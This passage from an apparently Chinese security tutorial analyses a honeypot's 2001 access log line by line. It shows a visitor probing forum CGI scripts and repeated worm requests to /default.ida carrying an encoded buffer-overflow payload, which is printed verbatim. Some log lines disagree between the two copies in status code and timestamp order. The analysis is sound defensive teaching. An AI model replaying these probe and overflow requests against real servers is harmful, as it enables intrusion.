我们就设置了一台httpd132f服务器,实际上这是一个专门等待黑客来进攻的服务器,因为黑客对这台系统的所有操作都记录在httpd.log文件中,所以学习者可以非常快的了解到黑客究竟在利用什么方法进攻服务器,这种学习方法见效非常快,这在我当初学习黑客的时候,给予了我大量宝贵的黑客进攻资料。
不用等待多长时间,黑客就来了,他在试图寻找我们这台服务器上的漏洞,看下面的日志文件:
61.172.14.9 - [02/Sep/2001:16:50:53 +0900] "GET /index.htm HTTP/1.1" 404 218
61.172.14.9 - [02/Sep/2001:16:58:27 +0900] "GET /cgi-bin/bbs/wwwboard.pl HTTP/1.1" 404 218
61.172.14.9 - [02/Sep/2001:17:02:53 +0900] "GET /cgi-bin/bbs.pl HTTP/1.1" 404 242
61.172.14.9 - [02/Sep/2001:17:10:16 +0900] "GET /cgi-bin/guestbook/guestbook.cgi HTTP/1.1" 404 242
61.172.14.9 - [02/Sep/2001:17:12:51 +0900] "GET /cgi-bin/bbs.cgi HTTP/1.1" 200 1032
61.172.14.9 - [02/Sep/2001:17:03:42 +0900] "GET /cgi-bin/bbs.cgi?a_method=fabiao&aaarpsd=&aaarname= HTTP/1.1" 404 218
61.172.14.9 - [02/Sep/2001:17:03:54 +0900] "GET /cgi-bin/bbs.cgi?a_method=fabiao&aaarpsd=&aaarname= HTTP/1.1" 404 218
61.172.14.9 - [02/Sep/2001:17:04:08 +0900] "GET /cgi-bin/bbs.cgi?a_method=fabiao&aaarpsd=&aaarname= HTTP/1.1" 200 3302
61.172.14.9 - [02/Sep/2001:17:04:27 +0900] "POST /cgi-bin/bbs.cgi HTTP/1.1" 200 177
61.172.14.9 - [02/Sep/2001:17:04:30 +0900] "GET /cgi-bin/bbs.cgi?a_method=win&aaarpsd=test&aaarname=max HTTP/1.1" 200 782
61.172.14.9 - [02/Sep/2001:17:04:32 +0900] "GET /cgi-bin/bbs.cgi?a_method=list&aaarpsd=test&aaarname=max HTTP/1.1" 200 4526
61.172.14.9 - [02/Sep/2001:17:04:42 +0900] "GET /cgi-bin/bbs.cgi?a_method=show&slttitle=2001-09-02.18:04:29&aaarname=macker&aaarpsd=test HTTP/1.1" 200 5785
61.172.14.9 - [02/Sep/2001:17:04:58 +0900] "POST /cgi-bin/bbs.cgi HTTP/1.1" 200 177
61.72.8.41 - [02/Sep/2001:20:38:57 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 404 218
61.79.163.130 - [02/Sep/2001:20:40:27 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 404 218
61.178.15.126 - [02/Sep/2001:20:40:57 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 404 218
61.135.5.75 - [02/Sep/2001:20:43:31 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 404 218
61.135.115.139 - [02/Sep/2001:20:49:09 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 404 218
61.135.115.139 - [02/Sep/2001:20:49:44 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 404 218
61.135.225.12 - [02/Sep/2001:20:53:15 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 404 218
61.188.194.141 - [02/Sep/2001:21:01:50 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 404 218
61.130.51.89 - [02/Sep/2001:21:11:29 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 404 218
61.73.97.116 - [02/Sep/2001:21:24:59 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 404 218
61.74.149.131 - [02/Sep/2001:21:44:17 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.1" 404 218
现在让我们来分析一下吧:
61.172.14.9 - - [02/Sep/2001:16:50:53 +0900] "GET /index.htm HTTP/1.1" 200 7612
黑客发现了我们这台服务器,并且通过浏览器观看网站上的/index.htm文件
61.172.14.9 - - [02/Sep/2001:16:58:27 +0900] "GET /cgi-bin/bbs/wwwboard.pl HTTP/1.1" 404 218
黑客开始试图寻找服务器上的论坛、免费代码,因为这些程序中会存在漏洞
61.172.14.9 - - [02/Sep/2001:17:02:53 +0900] "GET /cgi-bin/bbs.pl HTTP/1.1" 404 242
继续寻找,上面的/cgi-bin/bbs/wwwboard.pl和这里的/cgi-bin/bbs.pl是大多数网站服务器默认的论坛程序
61.172.14.9 - - [02/Sep/2001:17:10:16 +0900] "GET /cgi-bin/guestbook/guestbook.cgi HTTP/1.1" 404 242
寻找系统中默认的留言板程序,返回404,仍然没有找到可利用的程序
61.172.14.9 - - [02/Sep/2001:17:12:51 +0900] "GET /cgi-bin/bbs.cgi HTTP/1.1" 200 1032v 发现了一个/cgi-bin/bbs.cgi的电子留言版
61.172.14.9 - - [02/Sep/2001:17:03:42 +0900] "GET /cgi-bin/bbs.cgi?a_method=fabiao&aaarpsd=&aaarname= HTTP/1.1" 404 218
黑客简单的应用这个程序,它在观看这个留言板并且在尝试着发贴,没有成功
61.172.14.9 - - [02/Sep/2001:17:03:54 +0900] "GET /cgi-bin/bbs.cgi?a_method=''''''&aaarpsd=&aaarname= HTTP/1.1" 404 218
开始用特殊代码替换标准代码,试图找到bbs.cgi程序中的“考虑不周详漏洞”,没有成功
61.172.14.9 - - [02/Sep/2001:17:04:08 +0900] "GET /cgi-bin/bbs.cgi?a_method=fabiao&aaarpsd=&aaarname= HTTP/1.1" 200 3302
常规发表了一篇文件
61.172.14.9 - - [02/Sep/2001:17:04:27 +0900] "POST /cgi-bin/bbs.cgi HTTP/1.1" 200 177
发送发表的文章,发送成功
61.172.14.9 - - [02/Sep/2001:17:04:30 +0900] "GET /cgi-bin/bbs.cgi?a_method=win&aaarpsd=test&aaarname=macker HTTP/1.1" 200 782
黑客继续观看bbs.cgi,但是仍然局限在常规操作上
61.172.14.9 - - [02/Sep/2001:17:04:32 +0900] "GET /cgi-bin/bbs.cgi?a_method=listtitle&aaarpsd=test&aaarname=macker HTTP/1.1" 200 4526
继续常规的浏览bbs.cgi,这个时候黑客可能在网络上寻找这个bbs.cgi的源代码,因为有了源代码寻找漏洞将会更加方便
最后黑客放弃了,因为它没有找到bbs.cgi上的漏洞,当然不会有漏洞,因为bbs.cgi是本人用了两年的时间完善出来的一个论坛,不过如果学习者真想知道网络上的Perl中的漏洞,倒是可以用这种方法来“引诱”黑客进攻,这样你就可以很快了解黑客是利用的什么漏洞了。
这次来攻击的黑客似乎是个菜鸟,因为它没有使用漏洞扫描器,只不过简单的着了两个比较著名的论坛漏洞,因为我没有在自己的系统上安装那两个论坛,所以这个黑客无能为力了。
不过后来又闯进来一个黑客,从httpd.log分析这应该是一种蠕虫,每次变换的IP地址和非常特殊的GET请求都看得出来这个程序正在进行分散式溢出攻击,不过这种攻击主要针对IIS等流行的网站服务器程序,对于我使用的httpd132f却没有用处,因为httpd132f中不存在Null.htw、idc、ida等漏洞,这些漏洞在第三章已经介绍过,它们都是IIS中的典型漏洞,黑客也正是想攻过这些漏洞进行攻击,不过没有成功罢了。